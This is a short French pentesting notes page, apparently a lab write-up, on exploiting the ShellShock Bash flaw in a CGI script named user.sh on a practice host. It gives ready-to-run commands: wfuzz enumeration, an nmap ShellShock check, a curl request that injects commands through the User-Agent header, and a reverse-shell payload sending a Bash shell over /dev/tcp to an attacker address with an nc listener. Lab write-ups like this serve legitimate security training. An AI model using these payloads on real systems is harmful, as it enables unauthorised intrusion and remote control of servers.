ShellShock (user.sh) - Pentesting Web

Vulnérabilité ShellShock

Recherche de fichiers exploitables

Nous filtrons pour des fichiers avec des extensions comme .sh, .pl, ou .cgi :

wfuzz -c -t 200 --hc=404,403 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,sh-pl-cgi http://10.10.10.56/cgi-bin/FUZZ.FUZ2Z

Le fichier user.sh est identifié. Ce script semble dynamique et peut être vulnérable.

Détection de la vulnérabilité

Nous utilisons le script Nmap suivant pour tester la vulnérabilité :

nmap --script http-shellshock --script-args uri=/cgi-bin/user.sh -p80 10.10.10.56

Le scan confirme que le fichier user.sh est vulnérable à ShellShock.

Exécution de commandes

Pour tester l'exécution de commandes, nous utilisons curl avec un User-Agent malveillant :

curl -s -X GET "http://10.10.10.56/cgi-bin/user.sh" -H "User-Agent: () { :; }; echo; /usr/bin/whoami"

Cela retourne le nom de l'utilisateur actif.

Reverse Shell

Pour obtenir un shell inversé :

Écoutez sur le port 443 :

nc -nlvp 443

Injectez le payload suivant :

-H "User-Agent: () { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1'"

curl -s -X GET "http://10.10.10.56/cgi-bin/user.sh" -H "User-Agent: () { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1'"

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?